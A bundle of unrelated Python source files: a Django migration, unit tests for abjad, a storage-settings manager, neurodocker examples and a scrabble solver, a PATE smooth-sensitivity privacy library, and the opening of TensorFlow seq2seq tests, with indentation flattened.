('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
),
migrations.CreateModel(
name='PickerGrouping',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=75, unique=True)),
('status', models.CharField(choices=[('ACTV', 'Active'), ('IDLE', 'Inactive')], default='ACTV', max_length=4)),
],
),
migrations.CreateModel(
name='PickerMembership',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('status', models.CharField(choices=[('ACTV', 'Active'), ('IDLE', 'Inactive'), ('SUSP', 'Suspended'), ('MNGT', 'Manager')], default='ACTV', max_length=4)),
('autopick', models.CharField(choices=[('NONE', 'None'), ('RAND', 'Random')], default='RAND', max_length=4)),
('group', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='members', to='picker.PickerGrouping')),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='picker_memberships', to=settings.AUTH_USER_MODEL)),
],
),
migrations.AddField(
model_name='league',
name='current_season',
field=models.IntegerField(blank=True, null=True),
),
migrations.AddField(
model_name='league',
name='slug',
field=models.SlugField(default=picker.models.temp_slug),
),
migrations.AddField(
model_name='pickset',
name='is_winner',
field=models.BooleanField(default=False),
),
migrations.AlterField(
model_name='game',
name='category',
field=models.CharField(choices=[('REG', 'Regular Season'), ('POST', 'Post Season'), ('PRE', 'Pre Season'), ('FRND', 'Friendly')], default='REG', max_length=4),
),
migrations.AlterField(
model_name='game',
name='status',
field=models.CharField(choices=[('U', 'Unplayed'), ('T', 'Tie'), ('H', 'Home Win'), ('A', 'Away Win'), ('X', 'Cancelled')], default='U', max_length=1),
),
migrations.AlterField(
model_name='game',
name='tv',
field=models.CharField(blank=True, max_length=8, verbose_name='TV'),
),
migrations.AlterField(
model_name='gameset',
name='byes',
field=models.ManyToManyField(blank=True, related_name='bye_set', to='picker.Team', verbose_name='Bye Teams'),
),
migrations.AlterField(
model_name='league',
name='logo',
field=models.ImageField(blank=True, null=True, upload_to='picker/logos'),
),
migrations.AlterField(
model_name='pickset',
name='strategy',
field=models.CharField(choices=[('USER', 'User'), ('RAND', 'Random'), ('HOME', 'Home Team'), ('BEST', 'Best Record')], default='USER', max_length=4),
),
migrations.AlterField(
model_name='playoffpicks',
name='user',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='preference',
name='autopick',
field=models.CharField(choices=[('NONE', 'None'), ('RAND', 'Random')], default='RAND', max_length=4),
),
migrations.AlterField(
model_name='team',
name='logo',
field=models.ImageField(blank=True, null=True, upload_to='picker/logos'),
),
migrations.AlterUniqueTogether(
name='preference',
unique_together=set(),
),
migrations.AddField(
model_name='pickergrouping',
name='leagues',
field=models.ManyToManyField(blank=True, to='picker.League'),
),
migrations.AddField(
model_name='pickerfavorite',
name='league',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='picker.League'),
),
migrations.AddField(
model_name='pickerfavorite',
name='team',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='picker.Team'),
),
migrations.AddField(
model_name='pickerfavorite',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.RemoveField(
model_name='preference',
name='favorite_team',
),
migrations.RemoveField(
model_name='preference',
name='league',
),
migrations.RemoveField(
model_name='preference',
name='status',
),
]
|
import typing
import pytest
import abjad
values: typing.List[typing.Tuple] = []
values.extend((x / 2, (x / 2) % 12) for x in range(-48, 49))
values.extend(
[
("bf,", 10),
("c'", 0),
("cs'", 1),
("gff''", 5),
("", 0),
("dss,,", 4),
("fake", ValueError),
(("bf", 2), 10),
(("c", 4), 0),
(("cs", 4), 1),
(("dss", 1), 4),
(("gff", 5), 5),
(abjad.NamedPitch("bs'"), 0),
(abjad.NamedPitch("c"), 0),
(abjad.NamedPitch("cf,"), 11),
(abjad.NamedPitch(), 0),
(abjad.NamedPitchClass("cs'"), 1),
(abjad.NamedPitchClass("c"), 0),
(abjad.NamedPitchClass("cf,"), 11),
(None, 0),
(abjad.NumberedPitch("bs'"), 0),
(abjad.NumberedPitch("c"), 0),
(abjad.NumberedPitch("cf,"), 11),
(abjad.NumberedPitch(), 0),
(abjad.NumberedPitchClass("bs'"), 0),
(abjad.NumberedPitchClass("c"), 0),
(abjad.NumberedPitchClass("cf,"), 11),
]
)
@pytest.mark.parametrize("input_, expected_semitones", values)
def test_init(input_, expected_semitones):
if isinstance(expected_semitones, type) and issubclass(
expected_semitones, Exception
):
with pytest.raises(expected_semitones):
abjad.NumberedPitchClass(input_)
return
instance = abjad.NumberedPitchClass(input_)
assert float(instance) == expected_semitones
|
# Copyright (C) 2012 Red Hat, Inc. All rights reserved.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# Authors: Jan Safranek <jsafrane@redhat.com>
# -*- coding: utf-8 -*-
from StorageConfiguration import StorageConfiguration
from SettingManager import SettingManager, Setting
import unittest
import os
import shutil
class TestSetting(unittest.TestCase):
def setUp(self):
self.directory = os.path.dirname(__file__)
if not self.directory:
self.directory = "."
StorageConfiguration.CONFIG_FILE = "/not/existing"
self.config = StorageConfiguration()
def test_missing(self):
"""
Test loading persistent and preconfigured setting when appropriate
directories are missing.
"""
self.config.CONFIG_PATH = self.directory + "/configs/missing/etc/"
self.config.PERSISTENT_PATH = self.directory + "/configs/missing/var/"
mgr = SettingManager(self.config)
mgr.load()
self.assertDictEqual(mgr.classes, {})
def test_empty(self):
"""
Test loading persistent and preconfigured setting when appropriate
directories are empty.
"""
self.config.CONFIG_PATH = self.directory + "/configs/empty/etc/"
self.config.PERSISTENT_PATH = self.directory + "/configs/empty/var/"
mgr = SettingManager(self.config)
mgr.load()
self.assertDictEqual(mgr.classes, {})
def test_full(self):
"""
Test loading persistent and preconfigured setting when appropriate
directories are empty.
"""
self.config.CONFIG_PATH = self.directory + "/configs/full/etc/"
self.config.PERSISTENT_PATH = self.directory + "/configs/full/var/"
mgr = SettingManager(self.config)
mgr.load()
# check LMI_StorageSetting class loaded OK
self.assertTrue(mgr.classes.has_key("LMI_StorageSetting"))
# check it has all instances
settings = mgr.get_settings("LMI_StorageSetting")
self.assertIn("LMI:StorageSetting:preconfigured1", settings.keys())
self.assertIn("LMI:StorageSetting:preconfigured2", settings.keys())
self.assertIn("LMI:StorageSetting:persistent1", settings.keys())
self.assertIn("LMI:StorageSetting:persistent2", settings.keys())
self.assertEqual(len(settings.keys()), 4)
# check one preconfigured setting
s1 = settings['LMI:StorageSetting:preconfigured1']
self.assertEqual(s1.id, "LMI:StorageSetting:preconfigured1")
self.assertEqual(s1.type, Setting.TYPE_PRECONFIGURED)
self.assertEqual(s1['first'], "1")
self.assertEqual(s1['second'], "two")
self.assertEqual(s1['third'], "3.0")
# check one persistent setting
s2 = settings['LMI:StorageSetting:persistent2']
self.assertEqual(s2.id, "LMI:StorageSetting:persistent2")
self.assertEqual(s2.type, Setting.TYPE_PERSISTENT)
self.assertEqual(s2['first'], "1000")
self.assertEqual(s2['second'], "two thousand")
self.assertEqual(s2['third'], "3000.0")
def test_save_load(self):
""" Test saving a persistent settings and loading them back."""
# load the 'full' settings
self.config.CONFIG_PATH = self.directory + "/configs/full/etc/"
self.config.PERSISTENT_PATH = self.directory + "/configs/full/var/"
mgr = SettingManager(self.config)
mgr.load()
# dirty hack to save it to different directory...
self.config.PERSISTENT_PATH = self.directory + "/configs/save_load/var/"
# add one transient setting
s = Setting(Setting.TYPE_TRANSIENT, "LMI:StorageSetting:transient1")
s['first'] = "111"
s['second'] = "two two two"
s['third'] = "333.0"
mgr.set_setting("LMI_StorageSetting", s)
# add one preconfigured setting (this should not happen in reality,
# but let's test it).
s = Setting(Setting.TYPE_PRECONFIGURED, "LMI:StorageSetting:preconfigured3")
s['first'] = "1111"
s['second'] = "two two two two"
s['third'] = "3333.0"
mgr.set_setting("LMI_StorageSetting", s)
# add one persistent setting
s = Setting(Setting.TYPE_PERSISTENT, "LMI:StorageSetting:persistent3")
s['first'] = "11"
s['second'] = "two two"
s['third'] = "33.0"
mgr.set_setting("LMI_StorageSetting", s)
# the persistent setting should be saved
# try to reload the cofig - it should remove the preconfigured one
mgr.load()
# check it has all instances and that the preconfigured is gone
settings = mgr.get_settings("LMI_StorageSetting")
self.assertIn("LMI:StorageSetting:preconfigured1", settings.keys())
self.assertIn("LMI:StorageSetting:preconfigured2", settings.keys())
self.assertIn("LMI:StorageSetting:persistent1", settings.keys())
self.assertIn("LMI:StorageSetting:persistent2", settings.keys())
self.assertIn("LMI:StorageSetting:persistent3", settings.keys())
self.assertIn("LMI:StorageSetting:transient1", settings.keys())
self.assertEqual(len(settings.keys()), 6)
# check the transient is ok
s1 = settings['LMI:StorageSetting:transient1']
self.assertEqual(s1.id, "LMI:StorageSetting:transient1")
self.assertEqual(s1.type, Setting.TYPE_TRANSIENT)
self.assertEqual(s1['first'], "111")
self.assertEqual(s1['second'], "two two two")
self.assertEqual(s1['third'], "333.0")
# check the persistent is there
s2 = settings['LMI:StorageSetting:persistent3']
self.assertEqual(s2.id, "LMI:StorageSetting:persistent3")
self.assertEqual(s2.type, Setting.TYPE_PERSISTENT)
self.assertEqual(s2['first'], "11")
self.assertEqual(s2['second'], "two two")
self.assertEqual(s2['third'], "33.0")
# remove one persistent, it should be saved imediatelly
mgr.delete_setting('LMI_StorageSetting', s2)
# check it is really removed
mgr = SettingManager(self.config)
mgr.load()
settings = mgr.get_settings("LMI_StorageSetting")
self.assertNotIn("LMI:StorageSetting:persistent3", settings.keys())
# change one persistent, it should be saved imediatelly
s3 = settings['LMI:StorageSetting:persistent2']
s3['first'] = "-1"
s3['second'] = "minus one"
s3['third'] = "-3.0"
mgr.set_setting('LMI_StorageSetting', s3)
# check it is really removed
mgr = SettingManager(self.config)
mgr.load()
settings = mgr.get_settings("LMI_StorageSetting")
s3 = settings['LMI:StorageSetting:persistent2']
self.assertEqual(s3.id, "LMI:StorageSetting:persistent2")
self.assertEqual(s3.type, Setting.TYPE_PERSISTENT)
self.assertEqual(s3['first'], "-1")
self.assertEqual(s3['second'], "minus one")
self.assertEqual(s3['third'], "-3.0")
def tearDown(self):
# remove any files in configs/save_load/var/
path = self.directory + "/configs/save_load/var/"
shutil.rmtree(path, ignore_errors=True)
if __name__ == '__main__':
unittest.main()
|
"""Run the neurodocker examples and check for failures."""
import glob
import os
import subprocess
here = os.path.dirname(os.path.realpath(__file__))
def test_examples_readme():
with open(os.path.join(here, "README.md")) as f:
readme = f.read()
readme = readme.replace("\\\n", " ")
cmds = []
for line in readme.splitlines():
if not line.startswith("neurodocker generate"):
continue
s = line.split()
if 'docker' in s[2] and 'singularity' in s[2]:
s[2] = 'docker'
cmds.append(" ".join(s))
s[2] = 'singularity'
cmds.append(" ".join(s))
else:
cmds.append(line)
print("Testing {} commands from the examples README".format(len(cmds)))
with TemporaryChDir(here):
for c in cmds:
subprocess.run(c, shell=True, check=True)
def test_specialized_examples():
files = glob.glob(os.path.join(here, "**", "generate.sh"))
print("Testing {} commands from specialized examples".format(len(files)))
with TemporaryChDir(here):
for f in files:
subprocess.run(f, shell=True, check=True)
class TemporaryChDir:
def __init__(self, wd):
self.wd = wd
self._wd_orig = os.getcwd()
def __enter__(self):
os.chdir(self.wd)
def __exit__(self, exc_type, exc_value, tb):
os.chdir(self._wd_orig)
|
#! /usr/bin/env python
#
# Ben Osment
# Mon Nov 11 06:39:55 2013
"""Unit tests for scrabble.py"""
import unittest
import sys
import os
current_dir = os.getcwd()
src_dir = os.path.join(current_dir, 'scrabble')
tests_dir = os.path.join(current_dir, 'tests')
# add the source directory to the load path
sys.path.append(src_dir)
import scrabble
class TestScrabble(unittest.TestCase):
def setUp(self):
self.words = scrabble.build_wordlist(os.path.join(tests_dir,
'test_wordlist.txt'))
self.letters = 'dogcatrbbit'
def test_wordlist(self):
correct_words = ['dog', 'cat', 'rabbit']
self.assertEquals(self.words, correct_words)
def test_highest(self):
self.assertEquals(scrabble.find_highest(self.letters,
self.words), 'rabbit')
def test_wordscore(self):
self.assertEquals(scrabble.get_word_score('faze'), 16)
self.assertEquals(scrabble.get_word_score('fiz'), 15)
self.assertEquals(scrabble.get_word_score('ben'), 5)
def test_creatable(self):
self.assertTrue(scrabble.creatable('hat', 'aahhtt'))
self.assertFalse(scrabble.creatable('noon', 'nott'))
def test_all_scores(self):
ans = [('rabbit', 10), ('dog', 5), ('cat', 5)]
self.assertEquals(scrabble.all_scores(self.letters, self.words), ans)
if __name__ == '__main__':
unittest.main()
|
# Copyright 2017 The 'Scalable Private Learning with PATE' Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Functions for smooth sensitivity analysis for PATE mechanisms.
This library implements functionality for doing smooth sensitivity analysis
for Gaussian Noise Max (GNMax), Threshold with Gaussian noise, and Gaussian
Noise with Smooth Sensitivity (GNSS) mechanisms.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import math
from absl import app
import numpy as np
import scipy
import sympy as sp
import core as pate
################################
# SMOOTH SENSITIVITY FOR GNMAX #
################################
# Global dictionary for storing cached q0 values keyed by (sigma, order).
_logq0_cache = {}
def _compute_logq0(sigma, order):
key = (sigma, order)
if key in _logq0_cache:
return _logq0_cache[key]
logq0 = compute_logq0_gnmax(sigma, order)
_logq0_cache[key] = logq0 # Update the global variable.
return logq0
def _compute_logq1(sigma, order, num_classes):
logq0 = _compute_logq0(sigma, order) # Most likely already cached.
logq1 = math.log(_compute_bl_gnmax(math.exp(logq0), sigma, num_classes))
assert logq1 <= logq0
return logq1
def _compute_mu1_mu2_gnmax(sigma, logq):
# Computes mu1, mu2 according to Proposition 10.
mu2 = sigma * math.sqrt(-logq)
mu1 = mu2 + 1
return mu1, mu2
def _compute_data_dep_bound_gnmax(sigma, logq, order):
# Applies Theorem 6 in Appendix without checking that logq satisfies necessary
# constraints. The pre-conditions must be assured by comparing logq against
# logq0 by the caller.
variance = sigma**2
mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
eps1 = mu1 / variance
eps2 = mu2 / variance
log1q = np.log1p(-math.exp(logq)) # log1q = log(1-q)
log_a = (order - 1) * (
log1q - (np.log1p(-math.exp((logq + eps2) * (1 - 1 / mu2)))))
log_b = (order - 1) * (eps1 - logq / (mu1 - 1))
return np.logaddexp(log1q + log_a, logq + log_b) / (order - 1)
def _compute_rdp_gnmax(sigma, logq, order):
logq0 = _compute_logq0(sigma, order)
if logq >= logq0:
return pate.rdp_data_independent_gaussian(sigma, order)
else:
return _compute_data_dep_bound_gnmax(sigma, logq, order)
def compute_logq0_gnmax(sigma, order):
"""Computes the point where we start using data-independent bounds.
Args:
sigma: std of the Gaussian noise
order: Renyi order lambda
Returns:
logq0: the point above which the data-ind bound overtakes data-dependent
bound.
"""
def _check_validity_conditions(logq):
# Function returns true iff logq is in the range where data-dependent bound
# is valid. (Theorem 6 in Appendix.)
mu1, mu2 = _compute_mu1_mu2_gnmax(sigma, logq)
if mu1 < order:
return False
eps2 = mu2 / sigma**2
# Do computation in the log space. The condition below comes from Lemma 9
# from Appendix.
return (logq <= (mu2 - 1) * eps2 - mu2 * math.log(mu1 / (mu1 - 1) * mu2 /
(mu2 - 1)))
def _compare_dep_vs_ind(logq):
return (_compute_data_dep_bound_gnmax(sigma, logq, order) -
pate.rdp_data_independent_gaussian(sigma, order))
# Natural upper bounds on q0.
logub = min(-(1 + 1. / sigma)**2, -((order - .99) / sigma)**2, -1 / sigma**2)
assert _check_validity_conditions(logub)
# If data-dependent bound is already better, we are done already.
if _compare_dep_vs_ind(logub) < 0:
return logub
# Identifying a reasonable lower bound to bracket logq0.
loglb = 2 * logub # logub is negative, and thus loglb < logub.
while _compare_dep_vs_ind(loglb) > 0:
assert loglb > -10000, "The lower bound on q0 is way too low."
loglb *= 1.5
logq0, r = scipy.optimize.brentq(
_compare_dep_vs_ind, loglb, logub, full_output=True)
assert r.converged, "The root finding procedure failed to converge."
assert _check_validity_conditions(logq0) # just in case.
return logq0
def _compute_bl_gnmax(q, sigma, num_classes):
return ((num_classes - 1) / 2 * scipy.special.erfc(
1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_bu_gnmax(q, sigma, num_classes):
return min(1, (num_classes - 1) / 2 * scipy.special.erfc(
-1 / sigma + scipy.special.erfcinv(2 * q / (num_classes - 1))))
def _compute_local_sens_gnmax(logq, sigma, num_classes, order):
"""Implements Algorithm 3 (computes an upper bound on local sensitivity).
(See Proposition 13 for proof of correctness.)
"""
logq0 = _compute_logq0(sigma, order)
logq1 = _compute_logq1(sigma, order, num_classes)
if logq1 <= logq <= logq0:
logq = logq1
beta = _compute_rdp_gnmax(sigma, logq, order)
beta_bu_q = _compute_rdp_gnmax(
sigma, math.log(_compute_bu_gnmax(math.exp(logq), sigma, num_classes)),
order)
beta_bl_q = _compute_rdp_gnmax(
sigma, math.log(_compute_bl_gnmax(math.exp(logq), sigma, num_classes)),
order)
return max(beta_bu_q - beta, beta - beta_bl_q)
def compute_local_sensitivity_bounds_gnmax(votes, num_teachers, sigma, order):
"""Computes a list of max-LS-at-distance-d for the GNMax mechanism.
A more efficient implementation of Algorithms 4 and 5 working in time
O(teachers*classes). A naive implementation is O(teachers^2*classes) or worse.
Args:
votes: A numpy array of votes.
num_teachers: Total number of voting teachers.
sigma: Standard deviation of the Guassian noise.
order: The Renyi order.
Returns:
A numpy array of local sensitivities at distances d, 0 <= d <= num_teachers.
"""
num_classes = len(votes) # Called m in the paper.
logq0 = _compute_logq0(sigma, order)
logq1 = _compute_logq1(sigma, order, num_classes)
logq = pate.compute_logq_gaussian(votes, sigma)
plateau = _compute_local_sens_gnmax(logq1, sigma, num_classes, order)
res = np.full(num_teachers, plateau)
if logq1 <= logq <= logq0:
return res
# Invariant: votes is sorted in the non-increasing order.
votes = sorted(votes, reverse=True)
res[0] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)
curr_d = 0
go_left = logq > logq0 # Otherwise logq < logq1 and we go right.
# Iterate while the following is true:
# 1. If we are going left, logq is still larger than logq0 and we may still
# increase the gap between votes[0] and votes[1].
# 2. If we are going right, logq is still smaller than logq1.
while ((go_left and logq > logq0 and votes[1] > 0) or
(not go_left and logq < logq1)):
curr_d += 1
if go_left: # Try decreasing logq.
votes[0] += 1
votes[1] -= 1
idx = 1
# Restore the invariant. (Can be implemented more efficiently by keeping
# track of the range of indices equal to votes[1]. Does not seem to matter
# for the overall running time.)
while idx < len(votes) - 1 and votes[idx] < votes[idx + 1]:
votes[idx], votes[idx + 1] = votes[idx + 1], votes[idx]
idx += 1
else: # Go right, i.e., try increasing logq.
votes[0] -= 1
votes[1] += 1 # The invariant holds since otherwise logq >= logq1.
logq = pate.compute_logq_gaussian(votes, sigma)
res[curr_d] = _compute_local_sens_gnmax(logq, sigma, num_classes, order)
return res
##################################################
# SMOOTH SENSITIVITY FOR THE THRESHOLD MECHANISM #
##################################################
# A global dictionary of RDPs for various threshold values. Indexed by a 4-tuple
# (num_teachers, threshold, sigma, order).
_rdp_thresholds = {}
def _compute_rdp_list_threshold(num_teachers, threshold, sigma, order):
key = (num_teachers, threshold, sigma, order)
if key in _rdp_thresholds:
return _rdp_thresholds[key]
res = np.zeros(num_teachers + 1)
for v in range(0, num_teachers + 1):
logp = scipy.stats.norm.logsf(threshold - v, scale=sigma)
res[v] = pate.compute_rdp_threshold(logp, sigma, order)
_rdp_thresholds[key] = res
return res
def compute_local_sensitivity_bounds_threshold(counts, num_teachers, threshold,
sigma, order):
"""Computes a list of max-LS-at-distance-d for the threshold mechanism."""
def _compute_ls(v):
ls_step_up, ls_step_down = None, None
if v > 0:
ls_step_down = abs(rdp_list[v - 1] - rdp_list[v])
if v < num_teachers:
ls_step_up = abs(rdp_list[v + 1] - rdp_list[v])
return max(ls_step_down, ls_step_up) # Rely on max(x, None) = x.
cur_max = int(round(max(counts)))
rdp_list = _compute_rdp_list_threshold(num_teachers, threshold, sigma, order)
ls = np.zeros(num_teachers)
for d in range(max(cur_max, num_teachers - cur_max)):
ls_up, ls_down = None, None
if cur_max + d <= num_teachers:
ls_up = _compute_ls(cur_max + d)
if cur_max - d >= 0:
ls_down = _compute_ls(cur_max - d)
ls[d] = max(ls_up, ls_down)
return ls
#############################################
# PROCEDURES FOR SMOOTH SENSITIVITY RELEASE #
#############################################
# A global dictionary of exponentially decaying arrays. Indexed by beta.
dict_beta_discount = {}
def compute_discounted_max(beta, a):
n = len(a)
if beta not in dict_beta_discount or (len(dict_beta_discount[beta]) < n):
dict_beta_discount[beta] = np.exp(-beta * np.arange(n))
return max(a * dict_beta_discount[beta][:n])
def compute_smooth_sensitivity_gnmax(beta, counts, num_teachers, sigma, order):
"""Computes smooth sensitivity of a single application of GNMax."""
ls = compute_local_sensitivity_bounds_gnmax(counts, sigma, order,
num_teachers)
return compute_discounted_max(beta, ls)
def compute_rdp_of_smooth_sensitivity_gaussian(beta, sigma, order):
"""Computes the RDP curve for the GNSS mechanism.
Implements Theorem 23 (https://arxiv.org/pdf/1802.08908.pdf).
"""
if beta > 0 and not 1 < order < 1 / (2 * beta):
raise ValueError("Order outside the (1, 1/(2*beta)) range.")
return order * math.exp(2 * beta) / sigma**2 + (
-.5 * math.log(1 - 2 * order * beta) + beta * order) / (
order - 1)
def compute_params_for_ss_release(eps, delta):
"""Computes sigma for additive Gaussian noise scaled by smooth sensitivity.
Presently not used. (We proceed via RDP analysis.)
Compute beta, sigma for applying Lemma 2.6 (full version of Nissim et al.) via
Lemma 2.10.
"""
# Rather than applying Lemma 2.10 directly, which would give suboptimal alpha,
# (see http://www.cse.psu.edu/~ads22/pubs/NRS07/NRS07-full-draft-v1.pdf),
# we extract a sufficient condition on alpha from its proof.
#
# Let a = rho_(delta/2)(Z_1). Then solve for alpha such that
# 2 alpha a + alpha^2 = eps/2.
a = scipy.special.ndtri(1 - delta / 2)
alpha = math.sqrt(a**2 + eps / 2) - a
beta = eps / (2 * scipy.special.chdtri(1, delta / 2))
return alpha, beta
#######################################################
# SYMBOLIC-NUMERIC VERIFICATION OF CONDITIONS C5--C6. #
#######################################################
def _construct_symbolic_beta(q, sigma, order):
mu2 = sigma * sp.sqrt(sp.log(1 / q))
mu1 = mu2 + 1
eps1 = mu1 / sigma**2
eps2 = mu2 / sigma**2
a = (1 - q) / (1 - (q * sp.exp(eps2))**(1 - 1 / mu2))
b = sp.exp(eps1) / q**(1 / (mu1 - 1))
s = (1 - q) * a**(order - 1) + q * b**(order - 1)
return (1 / (order - 1)) * sp.log(s)
def _construct_symbolic_bu(q, sigma, m):
return (m - 1) / 2 * sp.erfc(sp.erfcinv(2 * q / (m - 1)) - 1 / sigma)
def _is_non_decreasing(fn, q, bounds):
"""Verifies whether the function is non-decreasing within a range.
Args:
fn: Symbolic function of a single variable.
q: The name of f's variable.
bounds: Pair of (lower_bound, upper_bound) reals.
Returns:
True iff the function is non-decreasing in the range.
"""
diff_fn = sp.diff(fn, q) # Symbolically compute the derivative.
diff_fn_lambdified = sp.lambdify(
q,
diff_fn,
modules=[
"numpy", {
"erfc": scipy.special.erfc,
"erfcinv": scipy.special.erfcinv
}
])
r = scipy.optimize.minimize_scalar(
diff_fn_lambdified, bounds=bounds, method="bounded")
assert r.success, "Minimizer failed to converge."
return r.fun >= 0 # Check whether the derivative is non-negative.
def check_conditions(sigma, m, order):
"""Checks conditions C5 and C6 (Section B.4.2 in Appendix)."""
q = sp.symbols("q", positive=True, real=True)
beta = _construct_symbolic_beta(q, sigma, order)
q0 = math.exp(compute_logq0_gnmax(sigma, order))
cond5 = _is_non_decreasing(beta, q, (0, q0))
if cond5:
bl_q0 = _compute_bl_gnmax(q0, sigma, m)
bu = _construct_symbolic_bu(q, sigma, m)
delta_beta = beta.subs(q, bu) - beta
cond6 = _is_non_decreasing(delta_beta, q, (0, bl_q0))
else:
cond6 = False # Skip the check, since Condition 5 is false already.
return (cond5, cond6)
def main(argv):
del argv # Unused.
if __name__ == "__main__":
app.run(main)
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for functional style sequence-to-sequence models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import functools
import math
import random
import sys
# TODO: #6568 Remove this hack that makes dlopen() not crash.
if hasattr(sys, "getdlopenflags") and hasattr(sys, "setdlopenflags"):
import ctypes
sys.setdlopenflags(sys.getdlopenflags() | ctypes.RTLD_GLOBAL)
import numpy as np
from tensorflow.contrib.legacy_seq2seq.python.ops import seq2seq as seq2seq_lib
from tensorflow.contrib.rnn.python.ops import core_rnn
from tensorflow.contrib.rnn.python.ops import core_rnn_cell_impl
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import gradients_impl
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import nn_impl
from tensorflow.python.ops import rnn
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.platform import test
from tensorflow.python.training import adam
class Seq2SeqTest(test.TestCase):
def testRNNDecoder(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
_, enc_state = core_rnn.static_rnn(
core_rnn_cell_impl.GRUCell(2), inp, dtype=dtypes.float32)
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
cell = core_rnn_cell_impl.OutputProjectionWrapper(
core_rnn_cell_impl.GRUCell(2), 4)
dec, mem = seq2seq_lib.rnn_decoder(dec_inp, enc_state, cell)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].shape)
def testBasicRNNSeq2Seq(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
cell = core_rnn_cell_impl.OutputProjectionWrapper(
core_rnn_cell_impl.GRUCell(2), 4)
dec, mem = seq2seq_lib.basic_rnn_seq2seq(inp, dec_inp, cell)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual((2, 2), res[0].shape)
def testTiedRNNSeq2Seq(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
dec_inp = [constant_op.constant(0.4, shape=[2, 2])] * 3
cell = core_rnn_cell_impl.OutputProjectionWrapper(
core_rnn_cell_impl.GRUCell(2), 4)
dec, mem = seq2seq_lib.tied_rnn_seq2seq(inp, dec_inp, cell)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 4), res[0].shape)
res = sess.run([mem])
self.assertEqual(1, len(res))
self.assertEqual((2, 2), res[0].shape)
def testEmbeddingRNNDecoder(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
inp = [constant_op.constant(0.5, shape=[2, 2])] * 2
cell_fn = lambda: core_rnn_cell_impl.BasicLSTMCell(2)
cell = cell_fn()
_, enc_state = core_rnn.static_rnn(cell, inp, dtype=dtypes.float32)
dec_inp = [
constant_op.constant(
i, dtypes.int32, shape=[2]) for i in range(3)
]
# Use a new cell instance since the attention decoder uses a
# different variable scope.
dec, mem = seq2seq_lib.embedding_rnn_decoder(
dec_inp, enc_state, cell_fn(), num_symbols=4, embedding_size=2)
sess.run([variables.global_variables_initializer()])
res = sess.run(dec)
self.assertEqual(3, len(res))
self.assertEqual((2, 2), res[0].shape)
res = sess.run([mem])
self.assertEqual(1, len(res))
self.assertEqual((2, 2), res[0].c.shape)
self.assertEqual((2, 2), res[0].h.shape)
def testEmbeddingRNNSeq2Seq(self):
with self.test_session() as sess:
with variable_scope.variable_scope(
"root", initializer=init_ops.constant_initializer(0.5)):
enc_inp = [
constant_op.constant(
